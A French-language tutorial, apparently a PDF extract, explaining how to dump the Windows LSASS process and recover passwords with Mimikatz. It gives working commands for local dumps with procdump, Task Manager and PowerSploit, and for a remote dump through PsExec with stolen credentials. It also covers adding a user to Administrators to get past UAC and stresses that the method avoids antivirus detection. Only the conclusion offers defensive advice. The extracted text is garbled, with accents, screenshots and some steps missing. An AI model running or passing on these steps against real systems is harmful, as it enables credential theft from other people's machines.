Professional Documents
Culture Documents
(v1.45)
ARTICLES ASSOCIES
Prambule
Dans un article prcdent nous prsentions le fonctionnement du logiciel Mimikatz dvelopp par
Benjamin DELPY. Nous avons ainsi pu constater que son module sekurlsa permettait la
rcupration de mots de passe contenus dans le processus LSASS de Windows.
A la suite, nous allons prsenter un autre module de Mimikatz permettant lextraction de mots de
passe partir dun dump . Pour information, un dump constitue une extraction mmoire dun
processus donn. Dans notre cas, lobjectif sera de raliser un dump du processus LSASS afin
dextraire et danalyser son contenu via le module minidump (source). Cette technique a pour
avantage de ne dclencher aucune action dtectable par les antivirus. De ce fait, son utilisation
prsente un intrt majeur lors de la ralisation dun dump sur une machine distante.
INDEX
1.
2.
En local................................................................................................................................................. 3
1.2
A distance ............................................................................................................................................ 6
Conclusion ........................................................................................................................................................... 9
IMPORTANT
Lobtention du privilge system par un attaquant permet doutrepasser un certain nombre de
mcanismes de scurit prsents sous Windows, dont la suppression du privilge debug (lien).
1.1 En local
1.1.1 Via Procdump
Pour raliser un dump en local du processus LSASS via le logiciel Procdump :
1. Tlchargez Procdump ici
2. Ouvrez une console DOS en tant quadministrateur sur le poste concern
3. Excutez lapplication avec les paramtres suivants :
C:\procdump.exe -accepteula -ma lsass.exe C:\%COMPUTERNAME%_lsass.dmp 2>&1
Remarque : si vous ne disposez pas des droits ncessaires, si la console na pas t ouverte en tant
quadministrateur ou si le privilge debug a t supprim, lerreur suivante apparatra :
Pour rcuprer les mots de passe contenus dans le dump, dirigez-vous au point 2.
2. Faites un clic droit sur le processus LSASS > Crer un fichier de vidage
Remarque : si vous ne disposez pas des droits ncessaires ou si le privilge debug a t supprim,
lerreur suivante apparatra :
Pour rcuprer les mots de passe contenus dans le dump, dirigez-vous au point 2.
4
1.1.3 En PowerShell
Il est galement possible de raliser un dump partir du module PowerSploit crit en PowerShell. Ce
dernier ncessite toutefois PowerShell v3 disponible depuis Windows 8 et Windows Server 2012.
1. Tlchargez le module PowerSploit ici
2. Copiez le dossier entier dans le rpertoire de modules PowerShell :
%windir%\System32\WindowsPowerShell\v1.0\Modules
3. Importez le module
Import-Module PowerSploit
4. Vrifiez la bonne importation du module et ses diffrentes commandes :
Get-Command -Module PowerSploit
1.2 A distance
IMPORTANT
LUAC empche lutilisation du logiciel PSexec uniquement sil est utilis avec un compte
local membre du groupe Administrateurs de la machine cible. Sil est utilis avec un
compte du domaine plac dans le groupe Administrateurs de la machine cible, alors lUAC
sera outrepass et PSexec excut
PSexec ncessite obligatoirement lactivation du partage de fichier en entre au niveau du
pare-feu pour fonctionner (SMB - 445)
Pour raliser un dump distance, il est ncessaire de disposer dun accs distant une machine.
Cette action implique de connatre son IP ou son nom DNS et de respecter la procdure suivante :
1. Tlchargez les outils suivants dans le mme dossier :
o PSexec (lien)
o Procdump (lien)
2. Rcuprez les identifiants dun utilisateur du domaine ou dun compte local. Passez
directement ltape 4 si:
o Lutilisateur du domaine est dj membre du groupe Administrateurs de la
machine cibles OU
o Le compte local est membre du groupe Administrateurs de la machine cible et
lUAC est dsactiv
3. Placez lutilisateur du domaine dans le groupe Administrateurs de la machine cible afin
doutrepasser lUAC : net localgroup <Administrator group> /add <domain\user>
o Remarque : on conviendra que la difficult de cette tape rside excuter cette
commande sans PSexec (puisquil est actuellement bloqu par lUAC) sur la machine
cible afin de passer ltape suivante
4. Excutez la commande ci-dessous en prenant soin dutiliser loption [-s] afin dexcuter
lapplication Procdump en tant que system :
PsExec.exe /accepteula \\<IP> u <domaine\user> p <password> -s -c procdump.exe -accepteula ma lsass.exe C:\%COMPUTERNAME%_lsass.dmp 2>&1
5. Rcuprez ensuite le dump gnr en utilisant (par exemple) un partage administratif (\\C$)
Remarque : si lUAC est activ et si vous utilisez un compte local membre du groupe
Administrateurs , une erreur apparatra. De la mme faon, lerreur la fin du point 1.1.1
apparatra si le privilge debug a t supprim.
Pour analyser et rcuprer les mots de passe contenus dans le dump, dirigez-vous au point 2.
Ouvrez ensuite le logiciel Mimikatz et excutez les commandes suivantes pour extraite les mots de
passe contenus dans le dump :
sekurlsa::minidump <fichier dump *.dmp>
sekurlsa::logonPasswords
Conclusion
La ralisation dun dump du processus LSASS constitue donc un vecteur dentre potentiel pour
les hackers afin de drober les mots de passe en mmoire. Et si les moyens de protection prsents
au sein de Windows constituent un premier niveau de scurit, il reste quils seront rapidement
outrepasss si une politique de privilge fine nest pas applique au sein de lorganisation.
En dfinitive, lUAC reprsente un moyen de protection efficace uniquement si lutilisateur courant
ne dispose pas de privilges dadministration sur son poste de travail. Dans ce sens, lutilisation dun
compte de domaine sans privilges dadministration et dun second compte de domaine avec des
privilges dadministration constitue un choix judicieux pour lutter contre ce type de menace. Veillez
toutefois restreindre louverture de sessions interactives avec le compte privilge afin que les
identifiants ne soient pas stocks dans le LSA cache (source).